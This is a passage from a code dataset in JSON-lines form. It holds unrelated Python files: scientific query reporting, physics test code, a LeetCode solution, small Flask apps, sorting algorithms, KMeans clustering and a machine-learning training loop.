{mc_type} model checker. '\n msg += '\\nPrevious result was:'\n msg += _process_result_to_str(old_result_json)\n msg += '\\nNew result is:'\n msg += _process_result_to_str(new_result_json)\n else:\n msg = f'\\nA result to query {query} in ' \\\n f'{model_name} from {mc_type} model checker ' \\\n f'did not change. The result is:'\n msg += _process_result_to_str(new_result_json)\n return msg\n\n def make_html_one_query_report(self, model_name, query, mc_type,\n new_result_json, old_result_json=None):\n \"\"\"Return an html page containing information about a query and any\n change in the results.\"\"\"\n msg = ''\n msg += self._make_html_one_query_inner(\n model_name, query, mc_type, new_result_json, old_result_json)\n msg += ''\n return msg\n\n def _make_html_one_query_inner(self, model_name, query, mc_type,\n new_result_json, old_result_json=None):\n # Create an html part for one query to be used in producing html report\n if is_query_result_diff(new_result_json, old_result_json):\n if not old_result_json:\n msg = f'

This is the first result to query {query} in ' \\\n f'{model_name} with {mc_type} model checker. ' \\\n f'The result is:
'\n msg += _process_result_to_html(new_result_json)\n msg += '

'\n else:\n msg = f'

A new result to query {query} in ' \\\n f'{model_name} was found with {mc_type} ' \\\n f'model checker.
'\n msg += '
Previous result was:
'\n msg += _process_result_to_html(old_result_json)\n msg += '
New result is:
'\n msg += _process_result_to_html(new_result_json)\n msg += '

'\n else:\n msg = f'

A result to query {query} in ' \\\n f'{model_name} from {mc_type} model checker did not ' \\\n f'change. The result is:
'\n msg += _process_result_to_html(new_result_json)\n msg += '

'\n return msg\n\n def notify_user(\n self, user_email, model_name, query, mc_type, new_result_json,\n old_result_json=None):\n \"\"\"Create a query result delta report and send it to user.\"\"\"\n str_msg = self.make_str_report_one_query(\n model_name, query, mc_type, new_result_json, old_result_json)\n html_msg = self.make_html_one_query_report(\n model_name, query, mc_type, new_result_json, old_result_json)\n # TODO send an email to user\n pass\n\n def get_model_manager(self, model_name):\n # Try get model manager from class attributes or load from s3.\n for mm in self.model_managers:\n if mm.model.name == model_name:\n return mm\n return load_model_manager_from_s3(model_name)\n\n def _recreate_db(self):\n self.db.drop_tables(force=True)\n self.db.create_tables()\n\n\ndef is_query_result_diff(new_result_json, old_result_json=None):\n \"\"\"Return True if there is a delta between results.\"\"\"\n # NOTE: this function is query-type specific so it may need to be\n # refactored as a method of the Query class:\n\n # Return True if this is the first result\n if not old_result_json:\n return True\n # Compare hashes of query results\n old_result_hashes = [k for k in old_result_json.keys()]\n new_result_hashes = [k for k in new_result_json.keys()]\n return not set(new_result_hashes) == set(old_result_hashes)\n\n\ndef format_results(results):\n \"\"\"Format db output to a standard json structure.\"\"\"\n formatted_results = []\n for result in results:\n formatted_result = {}\n formatted_result['model'] = result[0]\n query = result[1]\n formatted_result['query'] = _make_query_simple_dict(query)\n formatted_result['mc_type'] = result[2]\n response_json = result[3]\n response = _process_result_to_html(response_json)\n formatted_result['response'] = response\n formatted_result['date'] = make_date_str(result[4])\n formatted_results.append(formatted_result)\n return formatted_results\n\n\ndef load_model_manager_from_s3(model_name):\n model_manager = model_manager_cache.get(model_name)\n if model_manager:\n logger.info(f'Loaded model manager for {model_name} from cache.')\n return model_manager\n client = get_s3_client()\n key = f'results/{model_name}/latest_model_manager.pkl'\n logger.info(f'Loading latest model manager for {model_name} model from '\n f'S3.')\n obj = client.get_object(Bucket='emmaa', Key=key)\n body = obj['Body'].read()\n model_manager = pickle.loads(body)\n model_manager_cache[model_name] = model_manager\n return model_manager\n\n\ndef _process_result_to_str(result_json):\n # Remove the links when making text report\n msg = '\\n'\n for v in result_json.values():\n for sentence, link in v:\n msg += sentence\n return msg\n\n\ndef _process_result_to_html(result_json):\n # Make clickable links when making htmk report\n response_list = []\n for v in result_json.values():\n for ix, (sentence, link) in enumerate(v):\n if ix > 0:\n response_list.append('
')\n if link:\n response_list.append(\n f'{sentence}')\n else:\n response_list.append(f'{sentence}')\n response = ''.join(response_list)\n return response\n\n\ndef _make_query_simple_dict(query):\n \"\"\"Turn Query object into a simple dictionary for easier representation on\n the dashboard.\"\"\"\n query_dict = {}\n stmt = query.path_stmt\n query_dict['typeSelection'] = type(stmt).__name__\n subj, obj = stmt.agent_list()\n query_dict['subjectSelection'] = subj.name\n query_dict['objectSelection'] = obj.name\n return query_dict\n","sub_path":"emmaa/answer_queries.py","file_name":"answer_queries.py","file_ext":"py","file_size_in_byte":15809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"153055067","text":"from pathlib import Path\n\nimport numpy as np\nimport pytest\n\nfrom irnl_rdt_correction.constants import KEYWORD\nfrom irnl_rdt_correction.main import irnl_rdt_correction\nfrom tests.helpers import (\n generate_pseudo_model, generate_errortable, get_some_magnet_names,\n read_lhc_model, get_ir_magnets_mask, get_corrector_magnets_mask,\n get_opposite_sign_beam4_kl_columns,\n NAME, PLACEHOLDER, CIRCUIT, STRENGTH, IP, EPS, VALUE, MAX_N,\n)\n\n\n@pytest.mark.parametrize('order', range(3, MAX_N+1)) # 3 == Sextupole\n@pytest.mark.parametrize('orientation', ('skew', 'normal'))\n@pytest.mark.parametrize('accel', ('lhc', 'hllhc'))\ndef test_basic_correction(tmp_path: Path, order: int, orientation: str, accel: str):\n \"\"\"Tests the basic correction functionality and performs some sanity checks.\n Operates on a pseudo-model so that the corrector values are easily known.\n Sanity Checks:\n - all correctors found\n - correctors have the correct value (as set by errors or zero)\n - all corrector circuits present in madx-script\n \"\"\"\n # Parameters -----------------------------------------------------------\n if accel == 'lhc':\n if order == 5:\n pytest.skip(\"LHC has no decapole correctors\")\n if order == 6 and orientation == 'skew':\n pytest.skip(\"LHC has no skew dodecapole correctors\")\n\n orientation = \"S\" if orientation is \"skew\" else \"\"\n\n correct_ips = (1, 3)\n error_value = 2\n n_magnets = 4\n n_ips = 4\n\n n_correct_ips = len(correct_ips)\n n_sides = len(\"LR\")\n n_orientation = len([\"S\", \"\"])\n\n # Setup ----------------------------------------------------------------\n twiss = generate_pseudo_model(accel=accel, n_ips=n_ips, n_magnets=n_magnets)\n errors = generate_errortable(index=get_some_magnet_names(n_ips=n_ips, n_magnets=n_magnets))\n error_component = f\"K{order-1}{orientation}L\"\n errors[error_component] = error_value\n\n if order % 2: # order is odd -> sides have different sign in rdt\n left_hand_magnets = errors.index.str.match(r\".*L\\d$\")\n errors.loc[left_hand_magnets, error_component] = errors.loc[left_hand_magnets, error_component] / 2 # so they don't fully compensate\n\n # Correction -----------------------------------------------------------\n madx_corrections, df_corrections = irnl_rdt_correction(\n accel=accel,\n twiss=[twiss],\n errors=[errors],\n beams=[1],\n output=tmp_path / \"correct\",\n feeddown=0,\n ips=correct_ips,\n ignore_missing_columns=True,\n iterations=1,\n )\n\n # Testing --------------------------------------------------------------\n # Check output data ---\n assert len(list(tmp_path.glob(\"correct.*\"))) == 2\n\n # Check all found correctors ---\n if accel == 'lhc':\n assert len(df_corrections.index) == (\n n_orientation * n_sides * n_correct_ips * len(\"SO\") +\n n_sides * n_correct_ips * len(\"T\")\n )\n\n if accel == 'hllhc':\n assert len(df_corrections.index) == n_orientation * n_sides * n_correct_ips * len(\"SODT\")\n\n # All circuits in madx script ---\n for circuit in df_corrections[CIRCUIT]:\n assert circuit in madx_corrections\n\n # Check corrector values ---\n for test_order in range(3, MAX_N+1):\n for test_orientation in (\"S\", \"\"):\n for ip in correct_ips:\n mask = (\n (df_corrections[STRENGTH] == f\"K{test_order-1}{test_orientation}L\") &\n (df_corrections[IP] == ip)\n )\n if (test_order == order) and (test_orientation == orientation):\n if order % 2:\n corrector_strengths = sum(df_corrections.loc[mask, VALUE])\n assert abs(corrector_strengths) < EPS # correctors should be equally distributed\n\n corrector_strengths = -sum(df_corrections.loc[mask, VALUE].abs())\n # as beta cancels out (and is 1 anyway)\n error_strengths = n_magnets * error_value / 2 # account for partial compensation (from above)\n else:\n corrector_strengths = sum(df_corrections.loc[mask, VALUE])\n assert all(abs(df_corrections.loc[mask, VALUE] - corrector_strengths / n_sides) < EPS)\n # as beta cancels out (and is 1 anyway)\n error_strengths = (n_sides * n_magnets * error_value)\n assert abs(corrector_strengths + error_strengths) < EPS # compensation of RDT\n else:\n assert all(df_corrections.loc[mask, VALUE] == 0.)\n\n\n@pytest.mark.parametrize('beam', (1, 2, 4))\ndef test_lhc_correction(tmp_path: Path, beam: int):\n \"\"\"Test LHC optics with random errors assigned.\n Sanity Checks:\n - all correctors found\n - all correctors have a value\n - all corrector circuits present in madx-script\n \"\"\"\n # Setup ----------------------------------------------------------------\n np.random.seed(20211108)\n twiss = read_lhc_model(beam)\n mask_ir = get_ir_magnets_mask(twiss.index)\n twiss = twiss.loc[mask_ir, :]\n correctors = twiss.index[get_corrector_magnets_mask(twiss.index)]\n correct_ips = (1, 5)\n correctors = [c for c in correctors if int(c[-1]) in correct_ips]\n\n errors = generate_errortable(index=twiss.index)\n\n # here: 2 == sextupole\n errors.loc[:, [f\"K{order}{orientation}L\"\n for order in range(2, MAX_N) for orientation in (\"S\", \"\")]] = np.random.random([len(errors.index), 8])\n if beam == 4:\n negative_columns = get_opposite_sign_beam4_kl_columns(range(2, MAX_N))\n errors.loc[:, negative_columns] = -errors.loc[:, negative_columns]\n\n # Correction -----------------------------------------------------------\n madx_corrections, df_corrections = irnl_rdt_correction(\n accel='lhc',\n twiss=[twiss],\n errors=[errors],\n beams=[beam],\n output=tmp_path / \"correct\",\n feeddown=0,\n ips=correct_ips,\n ignore_missing_columns=True,\n iterations=1,\n )\n\n # Testing --------------------------------------------------------------\n # Check output data ---\n assert len(list(tmp_path.glob(\"correct.*\"))) == 2\n\n # All correctors present with a value ---\n assert len(df_corrections.index) == 2 * 2 * 5 - 1 # sides * ips * corrector orders - faulty MCOSX.3L1\n assert all(df_corrections[VALUE] != 0)\n\n found_correctors = df_corrections[NAME].to_numpy()\n for name in correctors:\n if twiss.loc[name, KEYWORD] == PLACEHOLDER:\n continue\n assert name in found_correctors\n\n # all corrector strengths are negative because all errors are positive (np.random.random)\n # this checks, that there is no sign-change between beam 1, 2 and 4.\n assert all(df_corrections[VALUE] < 0)\n\n # All circuits in madx script ---\n for circuit in df_corrections[CIRCUIT]:\n assert circuit in madx_corrections\n","sub_path":"tests/test_standard_correction.py","file_name":"test_standard_correction.py","file_ext":"py","file_size_in_byte":7045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"647502208","text":"'''\nGiven an array nums of n integers where n > 1, \nreturn an array output such that output[i] is equal to the product of all the elements of nums except nums[i].\n\nExample:\nInput: [1,2,3,4]\nOutput: [24,12,8,6]\n\nNote: \nPlease solve it without division and in O(n).\n\nFollow up:\nCould you solve it with constant space complexity? \n(The output array does not count as extra space for the purpose of space complexity analysis.)\n'''\n\n# 解法1:不使用除法\nclass Solution:\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n res = [1]*len(nums) # 不用除法\n p = 1\n for i in range(len(nums)):\n res[i] *= p\n p *= nums[i]\n\n p = 1\n for i in range(len(nums)-1, -1, -1):\n res[i] *= p\n p *= nums[i]\n return res\n# Runtime: 88 ms, faster than 99.94% of Python3 online submissions for Product of Array Except Self.\n\n# 解法2:使用除法\nclass Solution:\n def productExceptSelf(self, nums: List[int]) -> List[int]:\n zeros = nums.count(0)\n if zeros > 1:\n return [0] * len(nums)\n prod = 1\n for i in nums: # 使用除法\n if i:\n prod *= i\n if zeros == 1:\n return [0 if i else prod for i in nums]\n return [prod // i for i in nums]\n","sub_path":"201-300/238. Product of Array Except Self.py","file_name":"238. Product of Array Except Self.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570902217","text":"import json\nimport csv\nimport sys\nreload(sys); sys.setdefaultencoding('utf-8')\n\nwith open(\"test.json\") as file:\n data = json.load(file)\n\nwith open(\"data.csv\", \"w\") as file:\n csv_file = csv.writer(file)\n csv_file.writerow(\n [\"Subject\", \"Start Date\", \"Start Time\", \"End Date\", \"End Time\"])\n data = data['first']\n for item in data:\n csv_file.writerow([item.get('subject'), item.get('date'),\n item.get('time'), item.get('e_date'),\n unicode(item.get('e_time')).encode(\"utf-8\")])\n#http://int.soccerway.com/teams/ukraine/joint-stock-company-fc-shakhtar-donetsk/2254/matches/\n","sub_path":"json2csv.py","file_name":"json2csv.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417863336","text":"#!/usr/bin/env python3\n\nimport sys\nimport fileinput\nimport re\nimport argparse\n\n\"\"\"\n this script extracts words and word alignment simultaneously from the file where the format follows the files in this directory whose extension is 'wa'\n\"\"\"\n\ndef process(buffer):\n if len(buffer)!=3:\n sys.exit(\"len(buffer) is not 3\")\n if \"rejected\" in buffer[2]:\n return \"rejected\"\n fchars = buffer[0].rstrip().split()[1:] # remove the first word \"zh:\"\n return \"\".join(fchars)\n\nif __name__==\"__main__\":\n parser = argparse.ArgumentParser(prog=\"./extract.py\")\n parser.add_argument(\"input\", help=\"input file\")\n args = parser.parse_args()\n with open(args.input,\"r\") as i:\n buffer = []\n for line in i:\n if line.startswith(\"#\") and len(buffer)==3:\n print(process(buffer))\n buffer = []\n elif not line.startswith(\"#\"):\n buffer.append(line)\n\n if len(buffer)==3:\n print(process(buffer))\n","sub_path":"extract_chinese.py","file_name":"extract_chinese.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"88199084","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /home/nwinter/PycharmProjects/photon_projects/photon_core/photonai/investigator/app/main/controller/hyperpipe.py\n# Compiled at: 2019-09-11 10:06:06\n# Size of source mod 2**32: 8148 bytes\nfrom flask import render_template\nfrom ..main import application\nfrom photonai.processing.results_structure import MDBHyperpipe\nfrom photonai.processing.results_handler import ResultsHandler\nfrom pymodm.errors import ValidationError, ConnectionError\nfrom ..model.Metric import Metric\nfrom ..model.BestConfigTrace import BestConfigTrace\nfrom ..model.BestConfigPlot import BestConfigPlot\nfrom ..model.PlotlyTrace import PlotlyTrace\nfrom ..model.PlotlyPlot import PlotlyPlot\nfrom .helper import load_pipe, load_available_pipes\nfrom ..model.Figures import plotly_optimizer_history, plot_scatter, plotly_confusion_matrix\n\n@application.route('/pipeline/')\ndef index_pipeline(storage):\n try:\n available_pipes = load_available_pipes()\n pipeline_list = list(MDBHyperpipe.objects.all())\n return render_template('pipeline/index.html', s=storage, pipelines=pipeline_list, available_pipes=available_pipes)\n except ValidationError as exc:\n return exc.message\n except ConnectionError as exc:\n return exc.message\n\n\n@application.route('/error')\ndef show_error(msg):\n return render_template('default/error.html', error_msg=msg)\n\n\n@application.route('/pipeline//')\ndef show_pipeline(storage, name):\n try:\n available_pipes = load_available_pipes()\n pipe = load_pipe(storage, name)\n handler = ResultsHandler(pipe)\n config_evaluations = handler.get_config_evaluations()\n min_config_evaluations = handler.get_minimum_config_evaluations()\n optimizer_history = plotly_optimizer_history('optimizer_history', config_evaluations, min_config_evaluations, pipe.hyperpipe_info.best_config_metric)\n data_info = pipe.hyperpipe_info.data\n optimizer_info = pipe.hyperpipe_info.optimization\n cross_validation_info = pipe.hyperpipe_info.cross_validation\n best_config_plot_list = list()\n overview_plot_train = PlotlyPlot('overview_plot_training', 'Training Performance', show_legend=False)\n overview_plot_test = PlotlyPlot('overview_plot_test', 'Test Performance', show_legend=False)\n true_and_pred_val = list()\n true_and_pred_train = list()\n for fold in pipe.outer_folds:\n true_and_pred_val.append([fold.best_config.best_config_score.validation.y_true,\n fold.best_config.best_config_score.validation.y_pred])\n true_and_pred_train.append([fold.best_config.best_config_score.training.y_true,\n fold.best_config.best_config_score.training.y_pred])\n\n if pipe.hyperpipe_info.estimation_type == 'regressor':\n predictions_plot_train = plot_scatter(true_and_pred_train, 'predictions_plot_train', 'True/Pred Training')\n predictions_plot_test = plot_scatter(true_and_pred_val, 'predictions_plot_test', 'True/Pred Test')\n else:\n predictions_plot_train = plotly_confusion_matrix('predictions_plot_train', 'Confusion Matrix Training', true_and_pred_train)\n predictions_plot_test = plotly_confusion_matrix('predictions_plot_test', 'Confusion Matrix Test', true_and_pred_val)\n for fold in pipe.outer_folds:\n overview_plot_training_trace = PlotlyTrace(('fold_' + str(fold.fold_nr) + '_training'), trace_color='rgb(91, 91, 91)')\n overview_plot_test_trace = PlotlyTrace(('fold_' + str(fold.fold_nr) + '_test'), trace_color='rgb(91, 91, 91)')\n if fold.best_config:\n metric_training_list = list()\n metric_validation_list = list()\n for key, value in fold.best_config.best_config_score.training.metrics.items():\n overview_plot_training_trace.add_x(key)\n overview_plot_training_trace.add_y(value)\n metric = Metric(key, value)\n metric_training_list.append(metric)\n\n for key, value in fold.best_config.best_config_score.validation.metrics.items():\n overview_plot_test_trace.add_x(key)\n overview_plot_test_trace.add_y(value)\n metric = Metric(key, value)\n metric_validation_list.append(metric)\n\n overview_plot_train.add_trace(overview_plot_training_trace)\n overview_plot_test.add_trace(overview_plot_test_trace)\n metric_training_trace = BestConfigTrace('training', metric_training_list, '', 'bar')\n metric_test_trace = BestConfigTrace('test', metric_validation_list, '', 'bar')\n best_config_plot = BestConfigPlot('outer_fold_' + str(fold.fold_nr) + '_best_config_overview', 'Best Performance Outer Fold ' + str(fold.fold_nr), metric_training_trace, metric_test_trace)\n best_config_plot_list.append(best_config_plot)\n\n training_mean_trace = PlotlyTrace('mean', trace_size=8, trace_color='rgb(31, 119, 180)')\n test_mean_trace = PlotlyTrace('mean', trace_size=8, trace_color='rgb(214, 123, 25)')\n for metric in pipe.metrics_train:\n if metric.operation == 'FoldOperations.MEAN':\n training_mean_trace.add_x(metric.metric_name)\n training_mean_trace.add_y(metric.value)\n\n for metric in pipe.metrics_test:\n if metric.operation == 'FoldOperations.MEAN':\n test_mean_trace.add_x(metric.metric_name)\n test_mean_trace.add_y(metric.value)\n\n overview_plot_train.add_trace(training_mean_trace)\n overview_plot_test.add_trace(test_mean_trace)\n return render_template('outer_folds/index.html', pipe=pipe, best_config_plot_list=best_config_plot_list, overview_plot_train=overview_plot_train,\n overview_plot_test=overview_plot_test,\n predictions_plot_train=predictions_plot_train,\n predictions_plot_test=predictions_plot_test,\n optimizer_history=optimizer_history,\n s=storage,\n available_pipes=available_pipes,\n cross_validation_info=cross_validation_info,\n data_info=data_info,\n optimizer_info=optimizer_info)\n except ValidationError as exc:\n return exc.message\n except ConnectionError as exc:\n return exc.message","sub_path":"pycfiles/photonai-1.0.0b0.tar/hyperpipe.cpython-36.py","file_name":"hyperpipe.cpython-36.py","file_ext":"py","file_size_in_byte":6506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"455352085","text":"import json\nfrom flask import Flask, jsonify, render_template, request\n\napp = Flask(__name__)\n\nspec_one = {\"x\": [40, 60, 80], \"y\": [40, 60, 80]}\n\n@app.route('/_add_numbers')\ndef add_numbers():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n return jsonify(result=a + b)\n\n@app.route('/_spectest')\ndef spectest():\n a = request.args.get('a', 0, type=int)\n b = request.args.get('b', 0, type=int)\n return json.dumps(spec_one)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"80323782","text":"from math import floor #Used for rounding down (see merge_sort function)\nfrom math import ceil #Used for rounding up (see merge_sort function)\n\ndef selection(list, k=0):\n\tfor k in range(0, len(list)-1): #We don't need to run this for loop when k is the last element of the list, since by then the list will already be sorted\n\t\tfirst_element = list[k] #create an object that records the value of the first element that we are comparing to everything else in the list\n\t\tminimum_index = k #set the minimum_index to k, meaning k is (for now) the index of list that contains the lowest value\n\t\tfor index in range(k+1, len(list)): #compare k^th element to every other element after it in list\n\t\t\tif list[index] < list[k]: #If any other element in list is smaller than k, reset minimum_index to be the new element's index number\n\t\t\t\tminimum_index = index\n\t\tminimum = list[minimum_index] #extract the value of the smaller element\n\t\tif minimum < first_element:\n\t\t\tlist[k] = minimum #Switch the k^th element with the smaller element \n\t\t\tlist[minimum_index] = first_element\t\n\treturn list\n\ndef merge_sort(list):\n\tif len(list) <= 1:\n\t\treturn list\n\tleft = list[:len(list)/2] #Python somehow automatically knows that, even though len(list)/2 is an integer (rounded down), that when we write the colon before\n\tright = list[len(list)/2:] #we want the first half up to that integer, and when the colon comes after we want the integer + 1. So this still works even for lists of odd length. \n\tleft = merge_sort(left) #recursive part\n\tright = merge_sort(right) #recursive\n\ti = 0; j = 0\n\tmerged = [] #create empty list\n\twhile len(merged) < (len(left) + len(right)):\n\t\tif (i >= len(left)):\t\t #This and the first elif statement are designed to catch cases where we've already gone through every element of either right or left.\n\t\t\tmerged.append(right[j])\t #It basically just adds every remaining element of the right/left list onto the merged object in the original order. \n\t\t\tj += 1\t\t\t\t\t #This way we avoid indexing problems that would otherwise arise whenever we finished one of the lists before the other. \n\t\telif (j >= len(right)):\n\t\t\tmerged.append(left[i])\n\t\t\ti +=1\n\t\telif (right[j] <= left[i]): #Next two elif statements kick in if the previous few lines did not run; basically just switch the smaller values with earlier values\n\t\t\tmerged.append(right[j]) #when applicable, and then increment i/j\n\t\t\tj += 1\n\t\telif left[i] < right[j]:\n\t\t\tmerged.append(left[i])\n\t\t\ti += 1\n\treturn merged\t","sub_path":"hw3/sorting.py","file_name":"sorting.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"557535054","text":"import os\n\nfrom flask import Flask, jsonify, render_template, redirect, url_for, flash\nfrom flask_login import (\n current_user,\n login_user,\n login_required,\n LoginManager,\n logout_user,\n)\nfrom weaver.model import db, migrate, User, Post\nfrom weaver.forms import LoginForm, PostForm\n\n\ndef create_app():\n app = Flask(__name__, instance_relative_config=True)\n login_manager = LoginManager(app)\n db_url = os.getenv(\"DATABASE_URL\", \"postgresql://localhost/weaver\")\n secret_key = os.getenv(\"WV_SECRET_KEY\", \"dev\")\n\n app.config.from_mapping(\n SECRET_KEY=secret_key,\n SQLALCHEMY_DATABASE_URI=db_url,\n SQLALCHEMY_TRACK_MODIFICATIONS=False,\n )\n\n try:\n os.makedirs(app.instance_path)\n except FileExistsError:\n pass\n\n @login_manager.user_loader\n def load_user(user_id):\n return User.query.get(int(user_id))\n\n @app.route(\"/\", methods=[\"GET\"])\n def index():\n if current_user.is_authenticated:\n return render_template(\"index.html\", posts=Post.query.all())\n else:\n return render_template(\"index.html\")\n\n @app.route(\"/login\", methods=[\"GET\", \"POST\"])\n def login():\n if current_user.is_authenticated:\n return redirect(url_for(\"index\"))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(username=form.username.data).first()\n if user is None or not user.check_password(form.password.data):\n flash(\"invalid login!\")\n return redirect(url_for(\"login\"))\n login_user(user)\n return redirect(url_for(\"index\"))\n return render_template(\"login.html\", form=form)\n\n @app.route(\"/logout\", methods=[\"GET\"])\n def logout():\n logout_user()\n return redirect(url_for(\"login\"))\n\n @app.route(\"/post\", methods=[\"GET\", \"POST\"])\n @app.route(\"/post/\", methods=[\"GET\", \"POST\"])\n @login_required\n def submit_post(parent=None):\n form = PostForm()\n if form.validate_on_submit():\n new_post = Post(body=form.body.data, parent=parent)\n new_post.author = current_user\n new_post.make_digest()\n db.session.add(new_post)\n db.session.commit()\n return redirect(url_for(\"index\"))\n return render_template(\"post.html\", form=form)\n\n @app.route(\"/api/posts/all\", methods=[\"GET\"])\n @login_required\n def posts():\n all_posts = [\n {\n \"author\": p.author.username,\n \"parent\": p.parent,\n \"body\": p.body,\n \"created\": p.created,\n }\n for p in Post.query.all()\n ]\n return jsonify(all_posts)\n\n @app.route(\"/api/posts\", methods=[\"POST\"])\n @login_required\n def create_post():\n if \"body\" not in post_params:\n return \"Missing 'body' field in JSON.\", 400\n new_post = Post(**request.json)\n new_post.author = current_user\n new_post.make_digest()\n db.session.add(new_post)\n db.session.commit()\n\n db.init_app(app)\n migrate.init_app(app, db)\n\n return app\n","sub_path":"weaver/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"393192788","text":"# 使用KMeans进行聚类\r\nfrom sklearn.cluster import KMeans\r\nfrom sklearn import preprocessing\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\n# 数据加载\r\n#data = pd.read_csv('CarPrice_Assignment.csv', encoding='gbk')\r\ndata = pd.read_csv('CarPrice_Assignment.csv')\r\ntrain_x = data[['symboling', 'fueltype', 'aspiration', 'doornumber', 'carbody', 'drivewheel', 'enginelocation', 'wheelbase',\\\r\n 'carlength', 'carwidth', 'carheight', 'curbweight', 'enginetype', 'cylindernumber', 'enginesize', 'fuelsystem', 'boreratio',\\\r\n 'stroke', 'compressionratio', 'horsepower', 'peakrpm', 'citympg', 'highwaympg', 'price']]\r\n# print(train_x['fueltype'])\r\n\r\n# 如果存在非数值类型,需要使用LabelEncoder 将性别字段转化为数值male, female => 0, 1\r\nfrom sklearn.preprocessing import LabelEncoder\r\nle = LabelEncoder()\r\ntrain_x['fueltype'] = le.fit_transform(train_x['fueltype'])\r\ntrain_x['aspiration'] = le.fit_transform(train_x['aspiration'])\r\ntrain_x['doornumber'] = le.fit_transform(train_x['doornumber'])\r\ntrain_x['carbody'] = le.fit_transform(train_x['carbody'])\r\ntrain_x['drivewheel'] = le.fit_transform(train_x['drivewheel'])\r\ntrain_x['enginelocation'] = le.fit_transform(train_x['enginelocation'])\r\ntrain_x['enginetype'] = le.fit_transform(train_x['enginetype'])\r\ntrain_x['cylindernumber'] = le.fit_transform(train_x['cylindernumber'])\r\ntrain_x['fuelsystem'] = le.fit_transform(train_x['fuelsystem'])\r\n\r\n# print(train_x['fueltype'])\r\n\r\n\r\n# 规范化到 [0,1] 空间\r\nmin_max_scaler=preprocessing.MinMaxScaler()\r\n# train_x是个矩阵,包括4个列,每列分别做[min, max]\r\ntrain_x=min_max_scaler.fit_transform(train_x)\r\npd.DataFrame(train_x).to_csv('temp.csv', index=False,encoding='gbk')\r\n#print(train_x)\r\n\r\n\r\n### 使用KMeans聚类\r\nkmeans = KMeans(n_clusters=5)\r\n# 训练\r\nkmeans.fit(train_x)\r\n# 预测\r\npredict_y = kmeans.predict(train_x)\r\n# 合并聚类结果,插入到原数据中\r\nresult = pd.concat((data,pd.DataFrame(predict_y)),axis=1)\r\nresult.rename({0:u'聚类结果'},axis=1,inplace=True)\r\nprint(result)\r\n# 将结果导出到CSV文件中\r\nresult.to_csv(\"car_assignment.csv\",index=False,encoding='gbk')\r\n\r\n# K-Means 手肘法:统计不同K取值的误差平方和\r\nimport matplotlib.pyplot as plt\r\nsse = []\r\nfor k in range(1, 11):\r\n\t# kmeans算法\r\n\tkmeans = KMeans(n_clusters=k)\r\n\tkmeans.fit(train_x)\r\n\t# 计算inertia簇内误差平方和\r\n\tsse.append(kmeans.inertia_)\r\nx = range(1, 11)\r\nplt.xlabel('K')\r\nplt.ylabel('SSE')\r\nplt.plot(x, sse, 'o-')\r\nplt.show()\r\n\r\n## 使用层次聚类\r\nfrom scipy.cluster.hierarchy import dendrogram, ward\r\nfrom sklearn.cluster import KMeans, AgglomerativeClustering\r\nimport matplotlib.pyplot as plt\r\nmodel = AgglomerativeClustering(linkage='ward', n_clusters=3)\r\ny = model.fit_predict(train_x)\r\nprint(y)\r\n\r\nlinkage_matrix = ward(train_x)\r\ndendrogram(linkage_matrix)\r\nplt.show()\r\n\r\n","sub_path":"L3/car_assignment.py","file_name":"car_assignment.py","file_ext":"py","file_size_in_byte":2876,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"353324706","text":"import os\nimport numpy as np\nimport torch\nimport argparse\nfrom tensorboardX import SummaryWriter\nimport shutil\nimport time\nimport torch.backends.cudnn as cudnn\nfrom tqdm import tqdm\nimport sys\nsys.path.append('./')\nimport utils.losses as losses\nimport utils.detectors as detectors\nimport utils.metrics as metrics\nimport utils.optimizer as optim\nfrom models.model_builder import getModel\nfrom datasets.data_loader import getDataLoader\nfrom utils.pgd_attack import LinfPGDAttack\nfrom config import cfg\n\nglobal global_cfg\nglobal_cfg = dict()\n\n\ndef summary_write(summary, writer):\n for key in summary.keys():\n writer.add_scalar(key, summary[key], summary['epoch'])\n \n\ndef train_epoch_wo_outlier(model, optimizer, in_loader, loss_func, cur_epoch, op_cfg, writer):\n global global_cfg\n model.train()\n avg_loss = 0\n correct = 0\n in_data_size = len(in_loader.dataset)\n for cur_iter, in_set in enumerate(in_loader):\n #TODO: Dimension of in_set and out_set should be checked!\n \n # Data to GPU\n data = in_set[0]\n targets = in_set[1]\n if cur_iter == 0:\n writer.add_image('in_dist target {}'.format(targets[0]), data[0], cur_epoch)\n data, targets = data.cuda(), targets.cuda()\n \n # Adjust Learning rate\n lr = optim.get_lr_at_epoch(op_cfg, cur_epoch + float(cur_iter) / in_data_size)\n optim.set_lr(optimizer, lr)\n \n # Foward propagation and Calculate loss\n logits = model(data)\n \n global_cfg['loss']['model'] = model\n global_cfg['loss']['data'] = data\n loss_dict = loss_func(logits, targets, global_cfg['loss'])\n loss = loss_dict['loss']\n\n \n # Back propagation\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n \n # 